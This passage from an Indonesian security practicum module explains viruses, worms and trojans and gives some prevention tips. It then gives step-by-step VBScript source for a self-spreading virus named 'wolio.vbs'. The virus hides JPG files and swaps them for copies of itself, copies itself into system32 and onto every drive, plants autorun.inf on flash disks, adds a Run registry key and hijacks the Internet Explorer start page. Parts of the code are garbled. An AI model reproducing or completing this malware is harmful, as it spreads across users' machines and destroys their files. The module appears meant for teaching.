PENGERTIAN VIRUS, WORM, DAN TROJAN VIRUS

Berikut Desain Halaman Decode:

Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer (terutama pada sistem operasi , seperti sistem operasi berbasis keluarga Windows (Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Servicepack 1, Windows XP Servicepack 2) bahkan GNU/Linux. Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer (seperti CPU Time, penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% Virus adalah virus komputer berbasis sistim operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard). 2% lagi menyerang sistim operasi lain seperti FreeBSD, OS/2 IBM, dan Sun Operating System.

Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak antivirus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode untuk menghapus virus tersebut.

WORM

Worm atau cacing komputer dalam keamanan komputer, adalah sebutan untuk sebuah program yang menyebarkan dirinya di dalam banyak komputer, dengan menggandakan dirinya dalam memori setiap komputer yang terinfeksi. Sebuah worm dapat menggandakan dirinya dalam sebuah sistem komputer sehingga dapat menyebabkan sistem tersebut mengalami crash sehingga mengharuskan server harus di-restart. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm merupakan evolusi dari virus komputer.

Virus komputer memang dapat menginfeksi berkas-berkas dalam sebuah sistem komputer, tapi worm dapat melakukannya dengan lebih baik. Selain dapat menyebar dalam sebuah sistem, worm juga dapat menyebar ke banyak sistem melalui jaringan yang terhubung dengan sistem yang terinfeksi. Beberapa worm, juga dapat mencakup kode-kode virus yang dapat merusak berkas, mencuri dokumen, e-mail, atau melakukan hal lainnya yang merusak, atau hanya menjadikan sistem terinfeksi tidak berguna. Beberapa contoh dari worm adalah sebagai berikut:

Basic Script (VBScript). [ wikipedia indonesia ] TROJAN

Trojan adalah satu program “pemusnah” yang tidak dapat men-duplikasi dirinya sendiri. Program ini dilihat seperti amat berguna tetapi sebenarnya tidak. boleh dikatakan seperti “musuh dalam selimut”. Perkataan “Trojan” ini wujud dari satu mitos dari Greek. Pada masa peperangan dengan pihak Troy (Trojan), Greek telah meletak sebuah kuda kayu di luar pintu pagar kota Troy. Pihak Troy beranggapan bahawa Greek telah memberikan hadiah sebagai tanda kekalahan. Dan Troy membawa masuk kuda itu ke dalam kota mereka. Apabila malam menjelma, tentera-tentera Greek yang telah bersembunyi di dalam kuda itu keluar dan membuka pintu kota dan membolehkan tentera-tentera Greek masuk ke kota Troy dan menawan kota itu. Situasi ini samalah dengan program Trojan ini. Di mana, ianya nampak seperti amat berguna dan menarik. Tetapi kemusnahan yang dibawa adalah lebih buruk. Anda boleh dijangkiti trojan apabila anda menerima atau mendownload program-program dari Instant Messenging, warez, email attachment dan lain-lain lagi. Untuk membuang program trojan ini amat mudah. Anda hanya perlu mendelete program itu sendiri.

Penyebaran virus

Banyak orang awam yang beranggapan bahwa penyebaran virus disebabkan oleh lingkungan yang tidak sehat [ lewat udara / kontak langsung antara komputer dan anggota tubuh ], misalnya saja [ ini kisah nyata ], penulis pernah menemui teman penulis, ia curhat bahwa komputernya terkena virus, lalu ia beranggapan bahwa virus yang “dikandung” komputernya berasal dari kuman-kuman yang ada ditangannya, saya hampir saja mau tertawa lepas, tetapi karena teman, saya “terpaksa” hanya tersenyum. Penyebaran virus, worm atau trojan memang disebabkan oleh kelalaian kita tetapi bukan kotoran / kuman yang kita bawa, melainkan penyebaran virus dapat melalui disket atau floppy disk bahkan bisa melalui jaringan [ LAN ].

Pencegahan + pengobatan ada disini

Anda bisa meminimalisir semua dampak yang diakibatkan oleh virus dan kawan – kawannya itu, dengan cara sebagai berikut :

1.Sediakan Antivirus terpecaya. Jika memang data yang Anda miliki lebih penting daripada dokumen rahasia milik Negara, maka kami menyarankan Anda 24 jam sehari harus meng-update Antivirus.

2.Jangan pernah berganti – ganti pasangan, maksudnya Anda harus setia pada pasangan Anda [ flashdisk ], karena media inilah yang sering dijadikan “sarang” perpindahan oleh virus.

3.Baca doa dan tarik napas dalam – dalam [ hati – hati dan selektif maksud kami ], bila Anda menjumpai file yang Anda curigai pada komputer Anda dimana Anda tidak merasa membuat file itu dan Anda tertarik untuk meng-“eksekusi” file itu karena judulnya yang menarik, misalnya saja ada file atau dokumen yang namanya “Mau tahu hp Citra Bunga Lestari ? “ , itu salah satu varian terbaru dari virus [ terhitung bulan April 2007 ]

4.Buatlah data backup. Bila dirasa penting, usahakan data yang Anda simpan tidak hanya pada satu komputer saja, kalau perlu “titipkan” pada komputer lain, jadi sewaktu- waktu komputer Anda bermasalah, Anda masih mendapati data Anda. Tips ini hanya boleh dilakukan jika Anda memiliki lebih dari satu komputer. Lalu bagaimana yang tidak punya ? usahakan di “titipkan” pada orang yang paling Anda percayai misalnya orang tua atau pacar.

5.Ada cara tradisional yang cukup ampuh, yaitu tampilkan “details” extention dari masing document, misalnya saja untuk folder memiliki Type File Folder, untuk document word biasanya memiliki Type Microsoft Word Document. Tetapi jika Anda menjumpai Type “Application” untuk document word, maka bisa dipastikan itu adalah sebuah virus dan satu lagi jangan pernah meng”klik” dokumen itu walaupun dari luar memiliki judul yang bagus. Beberapa Extention yang harus wapasdai yaitu. *.COM, *.EXE, *.VBS, *.SCR, *.VB

6.Jika semua hal tersebut sudah Anda lakukan , niscaya Anda akan terjauh dari hal – hal ghaib, maksud kami gangguan yang tak diinginkan. Namun apabila komputer Anda masih terkena “serangan ghaib”, cepat – cepat Anda mencari vaksinnya, bila Anda masih bingung untuk mencari kemana, anda bisa mencarinya di serch Engine dan kombinasikan kata-katanya seperti ini “Virus+Nama_Virus”, misalnya “Virus+HP Citra Bunga Lestari” maka Anda akan menemukan beberapa tutorial yang Anda maksudkan. Atau Anda bisa kunjungi Vaksin.com, portal made in Indonesia ini biasanya menyediakan informasi terbaru tentang virus yang bergentayangan, disini sediakan pula solusi untuk menghapus virus – virus itu.

Virus ini mempunyai cara kerja yaitu menginfeksi aplikasi atau dokumen yang ada dalam komputer anda.Saat aplikasi yangterinfeksi tersebut dijalankan, maka virus ini akan menyebar dengan cara menginfeksi semua file atau dokumen yang diakses oleh aplikasi tersebut.

2. Virus Boot Sector

Virus ini mempunyai cara kerja yaitu menginfeksi boot sector harddisk (boot sector merupakan sebuah daerah dalam hardisk yang pertama kali diakses saat komputer dihidupkan). Jika virus boot sector ini aktif, pengguna tidak akan bisa membooting komputernya secara normal.

3. Virus E-mail

Virus ini mempunyai cara kerja yaitu menyebar melalui e-mail (biasanya dalam bentuk file lampiran/attachment).Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat. Apabila Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai alamat e-mail yang terdapat dalam bukualamat pengguna.

4. Virus Multipartite

Virus ini mempunyai cara kerja yaitu menginfeksi file-file komputer sekaligus boot sector pada harddisk. Virus jenis ini akan menimbulkan banyak masalah karena menyebabkan kerusakan yang fatal.

5. Virus Polimorfis

Virus ini mempunyai cara kerja yang unik yaitu virus ini dapat mengubah kode dirinya (berganti wujud) saat menyebarkan diri ke komputer lain. Virus jenis lebih sulit dideteksi karena mempunyai sifat seperti itu.

6. Virus Siluman (stealth virus)

Virus ini mempunyai cara kerja yaitu dia mampu Menyembunyikan dirinya dengan cara membuat sebuah file yang terinfeksi seolah-olah file tersebut tidak terinfeksi.

Virus ini mempunyai cara kerja yaitu menginfeksi Aplikasi Microsoft Office, seperti Word dan Excel. Biasanya Dokumen yang terinfeksi oleh Virus Makro akan memodifikasi perintah yang ada di Microsoft Office seperti perintah “Save” untuk menyebarkan dirinya saat perintah tersebut dijalankan.

Worm

Worm adalah sebuah program komputer yang dapat menggandakan dirinya secara sendiri dalam sistem komputer. Sebuah worm dapat menggandakan dirinya dengan memanfaatkan jaringan (LAN/WAN/Internet) tanpa perlu campur tangan dari user itu sendiri. Worm tidak seperti virus komputer biasa, yang menggandakan dirinya dengan cara menyisipkan program dirinya pada program yang ada dalam komputer tersebut, tapi worm memanfaatkan celah keamanaan yang memang terbuka atau lebih dikenal dengan sebutan vulnerability. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm merupakan evolusi dari virus komputer. Hanya ada satu cara untuk mengatasi worm yaitu dengan menutup celah keamanan yang terbuka tersebut, dengan cara meng-update patch atau Service Pack dari operating sistem yang digunakan dengan patch atau Service Pack yang paling terbaru. Virus komputer memang dapat menginfeksi berkas-berkas dalam sebuah sistemkomputer, tapi worm dapat melakukannya dengan lebih baik. Selain dapat menyebar dalam sebuah sistem, worm juga dapat menyebar ke banyak sistem melalui jaringan yang terhubung dengan sistem yang terinfeksi. Beberapa worm, juga dapat mencakup kode-kode virus yang dapat merusak berkas, mencuri dokumen, e-mail, atau melakukan hal lainnya yang merusak, atau hanya menjadikan sistem terinfeksi tidak berguna.

Beberapa contoh dari worm adalah sebagai berikut:

· ADMw0rm: Worm yang dapat melakukan ekspolitasi terhadap layanan jaringan Berkeley Internet Name Domain (BIND), denganmelakukan buffer-overflow.

· Code Red: Worm yang dapat melakukan eksploitasi terhadap layanan Internet Information Services (IIS) versi 4 dan versi 5, dengan melakukan serangan bufferoverflow.

· LoveLetter: Worm yang menyebar dengan cara mengirimkan dirinya melalui e-mail kepada semua akun yang terdaftar dalam Address Book Microsoft Outlook Express/daftar kontak dalam Microsoft Outlook dengan cara menggunakan kode Visual Basic Script (VBScript).

· Nimda

kemudian mulai “mendengarkan” di beberapa port untuk melakukan koneksi, memodifikasi registry dan atau menggunakan metode lain yaitu metode autostarting. Hal yang penting untuk diketahui oleh penyerang adalah mengetahui IP address korban untuk menghubungkan komputernya ke komputer korban. Banyak varian Trojan mempunyai kemampuan mengirimkan IP address korban ke penyerangnya, misalnya media ICQ maupun IRC. Hal ini digunakan bagi korban yang mempunyai IP address dinamis, yang berarti setiap kali menghubungkan ke Internet didapatkan IP address yang berbeda. Untuk pemakai yang memanfaatkan Asymmetric Digital Suscriber Line (ADSL) berarti selalu memakai IP address yang tetap (statis) sehingga mudah diketahui dan mudah untuk dikoneksikan dengan komputer penyerang.

Cara Membuat Virus Menggunakan Visual Basic (VB)

membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut.

Skenario virus tersebut adalah sebagai berikut:

1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.

2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows

3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart 4. Menularkan diri pada drive-drive yang aktif termasuk flash disk

5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer

Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:

1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas

Sub serangan_jpg(target) on error resume next

set ftarget=fso.GetFile(target)

set fsource = fso.GetFile(Wscript.ScriptFullName)

ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)

set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)

fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”))

& “jpg ” & “.vbs”) ftarget.Delete ftarget.Close fsource.Close End Sub Sub carifilejpg(folder)

For Each filetarget in fso.GetFolder(folder).Files

If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget) Next

End Sub

2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.

Sub serangan_drive()

Set fso = CreateObject(”Scripting.FileSystemObject”) Set Drives=fso.drives

adaflashdisk = False For Each drive in Drives If drive.isready Then

fsource.Copy(drive & “” & “wolio.vbs”)

If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True

End If Next

If adaflashdisk = True Then

set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)

fileautorun.WriteLine(”[AUTORUN]“) fileautorun.WriteLine(”RUN=wolio.vbs”) End If

End Sub

3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan

Sub serangan_ie()

If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet

Explorer\Main\Start

Page”)<>”c:\windows\system32\wolio.html”) Then

regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet

Explorer\Main\Start

Page”,”c:\windows\system32\wolio.html”

End If End Sub

4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus

filehtml.WriteLine(””) End Sub

5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus

Sub serangan_folder(foldername) on error resume next

For Each subfolder in fso.GetFolder(foldername).SubFolders fsource.Copy(subfolder & “wolio.vbs”)

carifilejpg(subfolder) next

End Sub

6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur

On Error Resume Next

dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,

filehtml, fileautorun dim adaflashdisk

set fso = CreateObject(”Scripting.FileSystemObject”) set fsource = fso.GetFile(Wscript.ScriptFullName) set regedit=CreateObject(”WScript.Shell”)

myfolder = Left(fsource,InStrRev(fsource,””))

„ Copy-kan diri ke “c:windowssystem32″

fsource.Copy(”c:windowssystem32wolio.vbs”)

„ Cari dan infeksi file JPG didalam folder carifilejpg(myfolder)

„ Copy-kan diri di sub folder yang ada

serangan_folder(myfolder) „ Regitry

(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current

\Version\Run\Wolio”)<>”c:\windows\system32\wolio.vbs”) Then

regedit.RegWrite

“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio

”,”c:\windows\system32\wolio.vbs”

End If

„ Copy-kan diri ke semua drive aktif

serangan_drive()

„ Buat file wolio.html

buat_html()

„ Ubah Start Page di Internet Explorer serangan_ie()

PERTEMUAN 11

Dalam dokumen Modul Praktikum Kemanan SIFO (Halaman 72-80)